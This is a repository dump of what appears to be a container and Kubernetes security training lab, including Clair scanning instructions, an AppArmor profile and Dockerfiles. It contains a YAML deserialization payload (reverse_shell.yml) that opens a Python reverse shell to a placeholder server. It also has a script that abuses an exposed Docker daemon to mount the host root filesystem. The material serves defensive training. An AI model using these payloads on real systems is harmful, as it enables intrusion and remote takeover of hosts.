├── .gitignore
├── Container
    ├── AppArmor
    │   ├── README.md
    │   ├── k8s-vul-flask-redis-armor
    │   └── reverse_shell.yml
    ├── Clair
    │   ├── README.md
    │   ├── clair-scanner
    │   └── img
    │   │   ├── Open-Terminal.png
    │   │   ├── cd-path.png
    │   │   ├── clair-db.png
    │   │   ├── run-clair.png
    │   │   └── run-scan.png
    ├── Docker-Daemon-Configuration
    │   ├── Dockerfile
    │   ├── README.md
    │   ├── __init__.py
    │   ├── img
    │   │   ├── daemon-config-1.png
    │   │   ├── daemon-config-2.png
    │   │   ├── daemon-config-3.png
    │   │   ├── daemon-config-4.png
    │   │   ├── daemon-config-5.png
    │   │   └── daemon-config-6.png
    │   ├── launch-malicious-docker.py
    │   ├── requirements.txt
    │   └── startup.sh
    ├── Docker-Hands-On
    │   ├── Dockerfile
    │   ├── Dockerfile-Lab.md
    │   ├── README.md
    │   ├── helloworld
    │   │   ├── app.py
    │   │   └── requirements.txt
    │   └── img
    │   │   ├── Open-Terminal.png
    │   │   ├── docker-exec.png
    │   │   ├── docker-images-list.png
    │   │   ├── docker-ps-a.png
    │   │   ├── docker-ps.png
    │   │   ├── docker-pull.png
    │   │   ├── docker-rm.png
    │   │   ├── docker-rmi-images.png
    │   │   ├── docker-run.png
    │   │   ├── docker-stop.png
    │   │   ├── exit-docker.png
    │   │   ├── open-app.png
    │   │   └── open_terminal.png
    ├── Docker-Monitoring
    │   ├── README.md
    │   └── img
    │   │   ├── auditd-1.png
    │   │   ├── auditd-2.png
    │   │   ├── auditd-3.png
    │   │   ├── auditd-4.png
    │   │   └── auditd-5.png
    ├── Docker-bench
    │   ├── README.md
    │   └── img
    │   │   ├── Open-Terminal.png
    │   │   ├── cd-path.png
    │   │   └── cmd.png
    ├── Limiting-Docker-Capabilities
    │   ├── README.md
    │   └── img
    │   │   └── Open-Terminal.png
    ├── Network-Namespace
    │   ├── README.md
    │   └── img
    │   │   ├── Open-Terminal.png
    │   │   ├── netns-1.png
    │   │   ├── netns-2.png
    │   │   ├── netns-3.png
    │   │   ├── netns-4.png
    │   │   ├── netns-5.png
    │   │   ├── netns-6.png
    │   │   └── netns-7.png
    ├── Non-Root Container
    │   └── README.md
    ├── OSQuery
    │   └── README.md
    ├── README.md
    ├── Resource-Management
    │   └── README.md
    ├── Trojanized-Docker-Image
    │   ├── README.md
    │   └── img
    │   │   ├── trojan-docker-1.png
    │   │   ├── trojan-docker-2.png
    │   │   ├── trojan-docker-3.png
    │   │   ├── trojan-docker-4.png
    │   │   ├── trojan-docker-5.png
    │   │   └── trojan-docker-6.png
    ├── Trusted-Images
    │   ├── README.md
    │   └── img
    │   │   ├── Open-Terminal.png
    │   │   └── docker-hub.png
    ├── Union-Mount-File-System
    │   ├── README.md
    │   └── img
    │   │   ├── ufs-1.png
    │   │   ├── ufs-2.png
    │   │   ├── ufs-3.png
    │   │   ├── ufs-4.png
    │   │   ├── ufs-5.png
    │   │   └── ufs-6.png
    ├── Vulnerable-Libraries-ShellShock
    │   ├── README.md
    │   └── img
    │   │   ├── Open-Terminal.png
    │   │   ├── defaced.png
    │   │   └── shellshock-browser.png
    ├── container-breakout
    │   ├── README.md
    │   └── img
    │   │   ├── remove_tmux.png
    │   │   ├── split_pane.png
    │   │   ├── terminate_process.png
    │   │   └── tmux-greenband.png
    ├── distroless
    │   ├── Dockerfile
    │   ├── README.md
    │   ├── __init__.py
    │   ├── app.py
    │   ├── distroful
    │   │   ├── Dockerfile
    │   │   ├── __init__.py
    │   │   ├── app.py
    │   │   └── requirements.txt
    │   └── requirements.txt
    ├── dive
    │   ├── README.md
    │   └── img
    │   │   └── Open-Terminal.png
    ├── extra
    │   └── container
    │   │   ├── Anchore
    │   │       ├── README.md
    │   │       ├── config.yaml
    │   │       ├── docker-compose.yaml
    │   │       └── img
    │   │       │   └── Open-Terminal.png
    │   │   ├── Authentication-Attacks-against-Host
    │   │       ├── README.md
    │   │       └── img
    │   │       │   └── Open-Terminal.png
    │   │   ├── Container-Orchestrators
    │   │       ├── Docker-Compose
    │   │       │   ├── README.md
    │   │       │   ├── conf.d
    │   │       │   │   └── app.conf
    │   │       │   ├── docker-compose.yml
    │   │       │   └── img
    │   │       │   │   ├── Open-Terminal.png
    │   │       │   │   └── app-status.png
    │   │       └── README.md
    │   │   ├── Dagda
    │   │       ├── README.md
    │   │       └── img
    │   │       │   ├── Open-Terminal.png
    │   │       │   ├── cd-path.png
    │   │       │   ├── dagda-db.png
    │   │       │   ├── env1.png
    │   │       │   └── env2.png
    │   │   ├── Denial-of-Service
    │   │       ├── README.md
    │   │       └── img
    │   │       │   └── Open-Terminal.png
    │   │   ├── Docker-Daemon-Direct-Access
    │   │       ├── README.md
    │   │       └── img
    │   │       │   ├── Open-Terminal.png
    │   │       │   ├── docker-exec.png
    │   │       │   ├── docker-ps.png
    │   │       │   ├── docker-rm.png
    │   │       │   ├── docker-run.png
    │   │       │   └── docker-stop.png
    │   │   ├── Docker-Monitoring
    │   │       ├── README.md
    │   │       └── img
    │   │       │   ├── auditd-1.png
    │   │       │   ├── auditd-2.png
    │   │       │   ├── auditd-3.png
    │   │       │   ├── auditd-4.png
    │   │       │   └── auditd-5.png
    │   │   ├── Network-Namespace
    │   │       ├── README.md
    │   │       └── img
    │   │       │   ├── Open-Terminal.png
    │   │       │   ├── netns-1.png
    │   │       │   ├── netns-2.png
    │   │       │   ├── netns-3.png
    │   │       │   ├── netns-4.png
    │   │       │   ├── netns-5.png
    │   │       │   ├── netns-6.png
    │   │       │   └── netns-7.png
    │   │   ├── Union-Mount-File-System
    │   │       ├── README.md
    │   │       └── img
    │   │       │   ├── ufs-1.png
    │   │       │   ├── ufs-2.png
    │   │       │   ├── ufs-3.png
    │   │       │   ├── ufs-4.png
    │   │       │   ├── ufs-5.png
    │   │       │   └── ufs-6.png
    │   │   ├── Vulnerable-Libraries-ShellShock
    │   │       ├── README.md
    │   │       └── img
    │   │       │   ├── Open-Terminal.png
    │   │       │   ├── defaced.png
    │   │       │   └── shellshock-browser.png
    │   │   └── dlayer
    │   │       ├── README.md
    │   │       └── img
    │   │           ├── Open-Terminal.png
    │   │           ├── dlayer-1.png
    │   │           ├── dlayer-2.png
    │   │           └── docker-images-list.png
    └── seccomp
    │   ├── README.md
    │   └── custom_profile.json
├── Kubernetes
    ├── Initial-Setup
    │   ├── README.md
    │   └── install_script.sh
    ├── Istio
    │   └── README.md
    ├── K8s-Cluster-Attack
    │   ├── README.md
    │   ├── __init__.py
    │   ├── malicious-redis
    │   │   ├── Dockerfile
    │   │   ├── docker-entrypoint.sh
    │   │   ├── post_db.sh
    │   │   └── redis.conf
    │   ├── malicious_pods
    │   │   ├── cminer.json
    │   │   └── malicious-redis-slave.json
    │   ├── ngflask-redis-service.yml
    │   ├── ngflaskredis-deployment.yml
    │   ├── payloads
    │   │   ├── reverse_shell.yml
    │   │   └── test_payment.yml
    │   ├── redis-service.yml
    │   ├── reverseproxy.conf
    │   ├── setup_flask_stack.sh
    │   ├── setup_insecure_kube.sh
    │   └── tornado_server.py
    ├── Kube-Bench
    │   ├── README.md
    │   ├── cfg
    │   │   ├── 1.6
    │   │   │   ├── federated.yaml
    │   │   │   ├── master.yaml
    │   │   │   └── node.yaml
    │   │   ├── 1.7
    │   │   │   ├── federated.yaml
    │   │   │   ├── master.yaml
    │   │   │   └── node.yaml
    │   │   ├── 1.8
    │   │   │   ├── config.yaml
    │   │   │   ├── federated.yaml
    │   │   │   ├── master.yaml
    │   │   │   └── node.yaml
    │   │   └── config.yaml
    │   ├── img
    │   │   ├── kube-bench-1.png
    │   │   ├── kube-bench-2.png
    │   │   ├── kube-bench-3.png
    │   │   └── kube-bench-4.png
    │   └── kube-bench
    ├── Kube-Hunter
    │   ├── README.md
    │   ├── __init__.py
    │   ├── img
    │   │   ├── kube-hunter-1.png
    │   │   ├── kube-hunter-2.png
    │   │   ├── kube-hunter-3.png
    │   │   ├── kube-hunter-4.png
    │   │   └── kube-hunter-5.png
    │   ├── kube-hunter.py
    │   ├── plugins
    │   │   ├── README.md
    │   │   └── __init__.py
    │   ├── requirements.txt
    │   └── src
    │   │   ├── README.md
    │   │   ├── __init__.py
    │   │   ├── core
    │   │       ├── __init__.py
    │   │       ├── events
    │   │       │   ├── __init__.py
    │   │       │   ├── handler.py
    │   │       │   └── types
    │   │       │   │   ├── __init__.py
    │   │       │   │   └── common.py
    │   │       └── types.py
    │   │   └── modules
    │   │       ├── __init__.py
    │   │       ├── discovery
    │   │           ├── __init__.py
    │   │           ├── apiserver.py
    │   │           ├── dashboard.py
    │   │           ├── hosts.py
    │   │           ├── kubelet.py
    │   │           ├── ports.py
    │   │           └── proxy.py
    │   │       ├── hunting
    │   │           ├── __init__.py
    │   │           ├── aks.py
    │   │           ├── certificates.py
    │   │           ├── dashboard.py
    │   │           ├── kubelet.py
    │   │           └── proxy.py
    │   │       └── report
    │   │           ├── __init__.py
    │   │           ├── collector.py
    │   │           ├── plain.py
    │   │           └── yaml.py
    ├── Kube-Sec
    │   ├── README.md
    │   ├── img
    │   │   ├── kube-sec-1.png
    │   │   └── kube-sec-2.png
    │   ├── insecure_vulflask_deployment.yaml
    │   └── kubesec
    ├── KubeAudit
    │   ├── README.md
    │   └── insecure_vulflask_deployment.yaml
    ├── PodSecurityPolicy
    │   ├── README.md
    │   ├── k8s-vul-flask-redis-armor
    │   ├── reverseproxy.conf
    │   └── secure-ngflask-deploy.yml
    ├── Prometheus-Grafana
    │   ├── README.md
    │   ├── clusterRole.yaml
    │   ├── config-map.yaml
    │   ├── grafana-prometheus.yaml
    │   ├── img
    │   │   ├── prometheus-grafana-1.png
    │   │   ├── prometheus-grafana-10.png
    │   │   ├── prometheus-grafana-11.png
    │   │   ├── prometheus-grafana-12.png
    │   │   ├── prometheus-grafana-13.png
    │   │   ├── prometheus-grafana-2.png
    │   │   ├── prometheus-grafana-3.png
    │   │   ├── prometheus-grafana-4.png
    │   │   ├── prometheus-grafana-5.png
    │   │   ├── prometheus-grafana-6.png
    │   │   ├── prometheus-grafana-7.png
    │   │   ├── prometheus-grafana-8.png
    │   │   └── prometheus-grafana-9.png
    │   ├── kubernetes-pod-monitoring.json
    │   ├── prometheus.yaml
    │   └── wecare-k8.yaml
    ├── README.md
    ├── ResourceQuota_Limit
    │   ├── README.md
    │   └── nginx-basic-limit.yaml
    ├── RoleBasedAccessControl
    │   ├── README.md
    │   ├── img
    │   │   ├── rbac-1.png
    │   │   ├── rbac-2.png
    │   │   ├── rbac-3.png
    │   │   ├── rbac-4.png
    │   │   ├── rbac-5.png
    │   │   ├── rbac-6.png
    │   │   ├── rbac-7.png
    │   │   ├── rbac-8.png
    │   │   └── rbac-9.png
    │   ├── role-deployment-manager.yaml
    │   └── rolebinding-deployment-manager.yaml
    ├── SealedSecrets
    │   ├── README.md
    │   ├── controller.yaml
    │   ├── mysecret.json
    │   └── sealedsecret-crd.yaml
    ├── SysdigFalco
    │   ├── README.md
    │   ├── __init__.py
    │   ├── falco-event-generator-deployment.yaml
    │   ├── falco_daemonset.yaml
    │   ├── img
    │   │   ├── sysdig-falco-1.png
    │   │   ├── sysdig-falco-2.png
    │   │   ├── sysdig-falco-3.png
    │   │   ├── sysdig-falco-4.png
    │   │   ├── sysdig-falco-5.png
    │   │   ├── sysdig-falco-6.png
    │   │   └── sysdig-falco-7.png
    │   └── tornado_server.py
    ├── VM
    │   ├── Initial-Setup
    │   │   └── README.md
    │   ├── K8s-Cluster-Attack
    │   │   ├── README.md
    │   │   ├── __init__.py
    │   │   ├── malicious-redis
    │   │   │   ├── Dockerfile
    │   │   │   ├── docker-entrypoint.sh
    │   │   │   ├── post_db.sh
    │   │   │   └── redis.conf
    │   │   ├── malicious_pods
    │   │   │   ├── cminer.json
    │   │   │   └── malicious-redis-slave.json
    │   │   ├── ngflask-redis-service.yml
    │   │   ├── ngflaskredis-deployment.yml
    │   │   ├── payloads
    │   │   │   ├── reverse_shell.yml
    │   │   │   └── test_payment.yml
    │   │   ├── redis-service.yml
    │   │   ├── reverseproxy.conf
    │   │   ├── setup_flask_stack.sh
    │   │   ├── setup_insecure_kube.sh
    │   │   └── tornado_server.py
    │   ├── Kube-Bench
    │   │   ├── README.md
    │   │   ├── cfg
    │   │   │   ├── 1.6
    │   │   │   │   ├── federated.yaml
    │   │   │   │   ├── master.yaml
    │   │   │   │   └── node.yaml
    │   │   │   ├── 1.7
    │   │   │   │   ├── federated.yaml
    │   │   │   │   ├── master.yaml
    │   │   │   │   └── node.yaml
    │   │   │   ├── 1.8
    │   │   │   │   ├── config.yaml
    │   │   │   │   ├── federated.yaml
    │   │   │   │   ├── master.yaml
    │   │   │   │   └── node.yaml
    │   │   │   └── config.yaml
    │   │   ├── img
    │   │   │   ├── kube-bench-1.png
    │   │   │   ├── kube-bench-2.png
    │   │   │   ├── kube-bench-3.png
    │   │   │   └── kube-bench-4.png
    │   │   └── kube-bench
    │   ├── Kube-Hunter
    │   │   ├── README.md
    │   │   ├── __init__.py
    │   │   ├── img
    │   │   │   ├── kube-hunter-1.png
    │   │   │   ├── kube-hunter-2.png
    │   │   │   ├── kube-hunter-3.png
    │   │   │   ├── kube-hunter-4.png
    │   │   │   └── kube-hunter-5.png
    │   │   ├── kube-hunter.py
    │   │   ├── plugins
    │   │   │   ├── README.md
    │   │   │   └── __init__.py
    │   │   ├── requirements.txt
    │   │   └── src
    │   │   │   ├── README.md
    │   │   │   ├── __init__.py
    │   │   │   ├── core
    │   │   │       ├── __init__.py
    │   │   │       ├── events
    │   │   │       │   ├── __init__.py
    │   │   │       │   ├── handler.py
    │   │   │       │   └── types
    │   │   │       │   │   ├── __init__.py
    │   │   │       │   │   └── common.py
    │   │   │       └── types.py
    │   │   │   └── modules
    │   │   │       ├── __init__.py
    │   │   │       ├── discovery
    │   │   │           ├── __init__.py
    │   │   │           ├── apiserver.py
    │   │   │           ├── dashboard.py
    │   │   │           ├── hosts.py
    │   │   │           ├── kubelet.py
    │   │   │           ├── ports.py
    │   │   │           └── proxy.py
    │   │   │       ├── hunting
    │   │   │           ├── __init__.py
    │   │   │           ├── aks.py
    │   │   │           ├── certificates.py
    │   │   │           ├── dashboard.py
    │   │   │           ├── kubelet.py
    │   │   │           └── proxy.py
    │   │   │       └── report
    │   │   │           ├── __init__.py
    │   │   │           ├── collector.py
    │   │   │           ├── plain.py
    │   │   │           └── yaml.py
    │   ├── Kube-Sec
    │   │   ├── README.md
    │   │   ├── img
    │   │   │   ├── kube-sec-1.png
    │   │   │   └── kube-sec-2.png
    │   │   ├── insecure_vulflask_deployment.yaml
    │   │   └── kubesec
    │   ├── PodSecurityPolicy
    │   │   ├── README.md
    │   │   ├── k8s-vul-flask-redis-armor
    │   │   ├── reverseproxy.conf
    │   │   └── secure-ngflask-deploy.yml
    │   ├── README.md
    │   ├── ResourceQuota_Limit
    │   │   ├── README.md
    │   │   └── nginx-basic-limit.yaml
    │   ├── RoleBasedAccessControl
    │   │   ├── README.md
    │   │   ├── img
    │   │   │   ├── rbac-1.png
    │   │   │   ├── rbac-2.png
    │   │   │   ├── rbac-3.png
    │   │   │   ├── rbac-4.png
    │   │   │   ├── rbac-5.png
    │   │   │   ├── rbac-6.png
    │   │   │   ├── rbac-7.png
    │   │   │   ├── rbac-8.png
    │   │   │   └── rbac-9.png
    │   │   ├── role-deployment-manager.yaml
    │   │   └── rolebinding-deployment-manager.yaml
    │   ├── SealedSecrets
    │   │   ├── README.md
    │   │   └── mysecret.json
    │   └── SysdigFalco
    │   │   ├── README.md
    │   │   ├── __init__.py
    │   │   ├── falco-event-generator-deployment.yaml
    │   │   ├── falco_daemonset.yaml
    │   │   ├── img
    │   │       ├── sysdig-falco-1.png
    │   │       ├── sysdig-falco-2.png
    │   │       ├── sysdig-falco-3.png
    │   │       ├── sysdig-falco-4.png
    │   │       ├── sysdig-falco-5.png
    │   │       ├── sysdig-falco-6.png
    │   │       └── sysdig-falco-7.png
    │   │   └── tornado_server.py
    └── Vault
    │   ├── README.md
    │   ├── kubernetes-vault.yaml
    │   ├── policy-kubernetes-vault.hcl
    │   ├── policy-sample-app.hcl
    │   ├── sample-app.yaml
    │   └── vault.yaml
├── README.md
├── Serverless
    ├── Algorithm-Confusion
    │   ├── README.md
    │   ├── img
    │   │   ├── Open-Terminal.png
    │   │   ├── click-local-storage.png
    │   │   ├── local-storage.png
    │   │   ├── login-page.png
    │   │   └── open-browser.png
    │   ├── public_key.pem
    │   ├── token.txt
    │   └── token_gen.js
    ├── Bandit
    │   ├── README.md
    │   └── img
    │   │   ├── bandit-1.png
    │   │   ├── bandit-2.png
    │   │   └── bandit-3.png
    ├── Deploy a Function
    │   └── README.md
    ├── Event-Injection-S3
    │   ├── README.md
    │   ├── img
    │   │   ├── click-upload-xml.png
    │   │   ├── click-xml-file.png
    │   │   ├── exploited-info.png
    │   │   ├── login-page.png
    │   │   ├── open-browser.png
    │   │   ├── register-page.png
    │   │   └── upload-file-view.png
    │   └── malicious-xml.xml
    ├── Initial-Setup
    │   ├── README.md
    │   └── install_script.sh
    ├── NodeJsScan
    │   ├── README.md
    │   └── img
    │   │   ├── nodejsscan-1.png
    │   │   ├── nodejsscan-2.png
    │   │   ├── nodejsscan-3.png
    │   │   └── nodejsscan-4.png
    ├── Non-Unique-Value
    │   ├── README.md
    │   └── img
    │   │   ├── Open-Terminal.png
    │   │   ├── click-protected.png
    │   │   ├── copy-token.png
    │   │   ├── finalised.png
    │   │   ├── local-storage.png
    │   │   ├── login-page.png
    │   │   ├── open-browser.png
    │   │   ├── paste-token.png
    │   │   └── register-page.png
    ├── None-Signed-Token
    │   ├── README.md
    │   └── img
    │   │   ├── Open-Terminal.png
    │   │   ├── get_token.png
    │   │   ├── local-storage.png
    │   │   ├── login-page.png
    │   │   ├── open-browser.png
    │   │   └── tamper-jwt.png
    ├── Npm-Audit
    │   ├── README.md
    │   └── img
    │   │   ├── npm-audit-1.png
    │   │   └── npm-audit-2.png
    ├── Permission-Flaw
    │   ├── README.md
    │   └── img
    │   │   ├── Open-Terminal.png
    │   │   ├── local-storage.png
    │   │   ├── login-page.png
    │   │   ├── network.png
    │   │   ├── open-browser.png
    │   │   ├── param.png
    │   │   ├── search-default-view.png
    │   │   ├── search-icon.png
    │   │   └── search-values.png
    ├── README.md
    ├── SQL Injection - FaaS
    │   └── README.md
    ├── Safety
    │   ├── README.md
    │   └── img
    │   │   ├── safety-1.png
    │   │   ├── safety-2.png
    │   │   ├── safety-3.png
    │   │   └── safety-4.png
    ├── Secrets-Management
    │   ├── README.md
    │   ├── ops
    │   │   ├── config.json.tpl
    │   │   └── setup_env.tf
    │   └── training-secrets
    │   │   ├── .gitignore
    │   │   ├── app.py
    │   │   └── requirements.txt
    ├── Server-Side-Template-Injection
    │   ├── README.md
    │   └── img
    │   │   └── Open-Terminal.png
    ├── Serverless-Attack
    │   ├── README.md
    │   ├── malicious-file.txt
    │   ├── read-etc-pwd.txt
    │   ├── read-py-files.txt
    │   └── readme.txt
    └── insecure-deployment
    │   ├── .arc
    │   ├── README.md
    │   ├── package-lock.json
    │   ├── package.json
    │   └── src
    │       └── http
    │           └── get-index
    │               ├── index.js
    │               ├── package-lock.json
    │               └── package.json
└── img
    ├── github.png
    ├── twitter.png
    └── we45logo.jpg


/.gitignore:
--------------------------------------------------------------------------------
 1 | .DS_Store
 2 | _book/
 3 | .idea/
 4 | Serverless/Secrets-Management/ops/.terraform/
 5 | Serverless/Secrets-Management/ops/terraform.tfstate
 6 | Serverless/Secrets-Management/ops/terraform.tfstate.backup
 7 | Serverless/Secrets-Management/training-secrets/.chalice/deployed/dev.json
 8 | Serverless/Secrets-Management/training-secrets/.chalice/config.json
 9 | Serverless/Secrets-Management/ops/config.json
10 | 


--------------------------------------------------------------------------------
/Container/AppArmor/k8s-vul-flask-redis-armor:
--------------------------------------------------------------------------------
 1 | #include <tunables/global>
 2 | profile k8s-vul-flask-redis-armor flags=(attach_disconnected,mediate_deleted) {
 3 |   #include <abstractions/base>
 4 |   file,
 5 |   network,
 6 |   capability,
 7 |   deny /apps/** w, #deny file write to /app directory
 8 |   deny /tmp/** w, #deny file write to /tmp directory
 9 |   deny /etc/passwd rwklx, #deny all access to /etc/passwd
10 |   deny /etc/shadow rwklx, #deny all access to /etc/shadow
11 | 
12 |   #restrict access to HOME
13 | 
14 |   audit deny @{HOME}/.* mrwkl,
15 |   audit deny @{HOME}/.*/ rw,
16 |   audit deny @{HOME}/.*/** mrwkl,
17 |   audit deny @{HOME}/bin/ rw,
18 |   audit deny @{HOME}/bin/** mrwkl,
19 |   # @{HOME}/ r,
20 |   # @{HOME}/** rw,
21 | }
22 | 


--------------------------------------------------------------------------------
/Container/AppArmor/reverse_shell.yml:
--------------------------------------------------------------------------------
1 | name: PayTM Bill payment 3
2 | reason: !!python/object/apply:os.system ["echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"Server_IP_Here\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' > shell.py && python shell.py &"]
3 | merchant: Hello World Traders
4 | amount: 12
5 | card: 4111111111111111


--------------------------------------------------------------------------------
/Container/Clair/README.md:
--------------------------------------------------------------------------------
 1 | # Clair
 2 | 
 3 | ---
 4 | 
 5 | * SSH into your Virtual Lab or open Terminal, if you're on the VM
 6 | 
 7 | * Run `cd /root/labs/container_training/Container/Clair` into Clair Lab Folder
 8 | 
 9 | * Run clair related docker containers
10 | 
11 |     * `docker run -d -p 5432:5432 --name db arminc/clair-db:2019-01-01`
12 |     
13 |     ```commandline
14 |      root@we45:container_training/Container/Container-Vulnerability-Assessment/Clair# docker run -d -p 5432:5432 --name db arminc/clair-db:2017-09-18
15 |      e4cc159b0a71400ef6e57b4b2e5207b44bc4ceda630c27c551026a197b7f7414
16 |     ```
17 |     
18 |     * `docker run -d -p 6060:6060 --link db:postgres --name clair arminc/clair-local-scan:v2.0.1`
19 |     
20 |     ```commandline
21 |     root@we45:container_training/Container/Container-Vulnerability-Assessment/Clair# docker run -d -p 6060:6060 --link db:postgres --name clair arminc/clair-local-scan:v2.0.1
22 |     4e3e38be1f84ff757836ea1cf34184d160b90a9a63ee236b7134d2a842a74f58
23 |     ```
24 | 
25 | * Run Clair Scan 
26 |     * `./clair-scanner --ip <VM_IP> -r clair_report.json abhaybhargav/vul_flask:latest`
27 |     ![](img/run-scan.png)
28 | 
29 | * Run `clean-docker` to stop all the containers
30 | 
31 | ```commandline
32 | root@we45:~$ clean-docker
33 | ```
34 | 


--------------------------------------------------------------------------------
/Container/Clair/clair-scanner:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Clair/clair-scanner


--------------------------------------------------------------------------------
/Container/Clair/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Clair/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/Clair/img/cd-path.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Clair/img/cd-path.png


--------------------------------------------------------------------------------
/Container/Clair/img/clair-db.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Clair/img/clair-db.png


--------------------------------------------------------------------------------
/Container/Clair/img/run-clair.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Clair/img/run-clair.png


--------------------------------------------------------------------------------
/Container/Clair/img/run-scan.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Clair/img/run-scan.png


--------------------------------------------------------------------------------
/Container/Docker-Daemon-Configuration/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM ubuntu:latest
 2 | 
 3 | ENV DEBIAN_FRONTEND noninteractive
 4 | 
 5 | RUN apt-get update -y && \
 6 | apt-get install -y \
 7 | git \
 8 | xvfb \
 9 | x11vnc \
10 | wget \
11 | python \
12 | python-numpy \
13 | unzip \
14 | menu \
15 | geany \
16 | openbox \
17 | net-tools \
18 | geany \
19 | menu \
20 | openjdk-8-jre \
21 | firefox &&  wget -qO- https://get.docker.com | sh
22 | 
23 | Run cd /root && git clone https://github.com/kanaka/noVNC.git && \
24 | cd noVNC/utils && git clone https://github.com/kanaka/websockify websockify && \
25 | cd /root
26 | 
27 | ADD startup.sh /startup.sh
28 | 
29 | RUN chmod 0755 /startup.sh && \
30 | apt-get autoclean && \
31 | apt-get autoremove && \
32 | rm -rf /var/lib/apt/lists/*
33 | 
34 | CMD /startup.sh
35 | 


--------------------------------------------------------------------------------
/Container/Docker-Daemon-Configuration/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Daemon-Configuration/__init__.py


--------------------------------------------------------------------------------
/Container/Docker-Daemon-Configuration/img/daemon-config-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Daemon-Configuration/img/daemon-config-1.png


--------------------------------------------------------------------------------
/Container/Docker-Daemon-Configuration/img/daemon-config-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Daemon-Configuration/img/daemon-config-2.png


--------------------------------------------------------------------------------
/Container/Docker-Daemon-Configuration/img/daemon-config-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Daemon-Configuration/img/daemon-config-3.png


--------------------------------------------------------------------------------
/Container/Docker-Daemon-Configuration/img/daemon-config-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Daemon-Configuration/img/daemon-config-4.png


--------------------------------------------------------------------------------
/Container/Docker-Daemon-Configuration/img/daemon-config-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Daemon-Configuration/img/daemon-config-5.png


--------------------------------------------------------------------------------
/Container/Docker-Daemon-Configuration/img/daemon-config-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Daemon-Configuration/img/daemon-config-6.png


--------------------------------------------------------------------------------
/Container/Docker-Daemon-Configuration/launch-malicious-docker.py:
--------------------------------------------------------------------------------
1 | import docker
2 | client = docker.DockerClient(base_url='tcp://127.0.0.1:4243')
3 | 
4 | malicious_image = 'we45/docker-ui:latest'
5 | client.images.pull(malicious_image)
6 | port_key = {"{0}/tcp".format(6080): ('0.0.0.0', 6080)}
7 | 
8 | client.containers.run(image=malicious_image, ports=port_key, volumes={'/': {'bind': '/rootFS/', 'mode': 'rw'}, '/var/run/docker.sock': {'bind': '/var/run/docker.sock', 'mode': 'rw'}}, detach=True)
9 | 


--------------------------------------------------------------------------------
/Container/Docker-Daemon-Configuration/requirements.txt:
--------------------------------------------------------------------------------
 1 | argparse==1.2.1
 2 | backports.ssl-match-hostname==3.5.0.1
 3 | certifi==2018.8.24
 4 | chardet==3.0.4
 5 | docker==3.5.0
 6 | docker-pycreds==0.3.0
 7 | idna==2.7
 8 | ipaddress==1.0.22
 9 | requests==2.19.1
10 | six==1.11.0
11 | urllib3==1.23
12 | websocket-client==0.53.0
13 | wsgiref==0.1.2


--------------------------------------------------------------------------------
/Container/Docker-Daemon-Configuration/startup.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | export DISPLAY=:1
3 | Xvfb :1 -screen 0 1600x900x16 &
4 | sleep 5
5 | openbox-session&
6 | x11vnc -display :1 -nopw -listen localhost -xkb -ncache 10 -ncache_cr -forever &
7 | cd /root/noVNC && ln -s vnc_auto.html index.html && ./utils/launch.sh --vnc localhost:5900
8 | 


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM ubuntu:latest
 2 | RUN apt-get update && apt-get install wget -y && wget -qO- https://get.docker.com | sh
 3 | RUN apt install -y ufw python-pip python-dev
 4 | RUN mkdir app
 5 | COPY helloworld /app/helloworld
 6 | ENV TESTENV="test"
 7 | WORKDIR /app/helloworld/
 8 | RUN pip install -r requirements.txt
 9 | EXPOSE 5000
10 | ENTRYPOINT ["python"]
11 | CMD ["app.py"]
12 | 
13 | 
14 | 


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/README.md:
--------------------------------------------------------------------------------
 1 | # Docker Hands-On
 2 | 
 3 | 
 4 | ##### Step 1:
 5 | 
 6 | * Pull the latest `abhaybhargav/vul_flask` docker image from DockerHub.
 7 | 
 8 | ```commandline
 9 | docker pull abhaybhargav/vul_flask
10 | ```
11 | 
12 | 
13 | ##### Step 2: 
14 |   
15 | * List all docker images on the machine.
16 | 
17 | ```bash
18 | docker images
19 | ```
20 | 
21 | 
22 | ##### Step 3:
23 | 
24 | * Run the `abhaybhargav/vul_flask` docker image.
25 | 
26 | ```bash
27 | docker run -d --name vul_flask abhaybhargav/vul_flask
28 | ```
29 | 
30 | 
31 | ##### Step 4:
32 | 
33 | * View all running containers.
34 | 
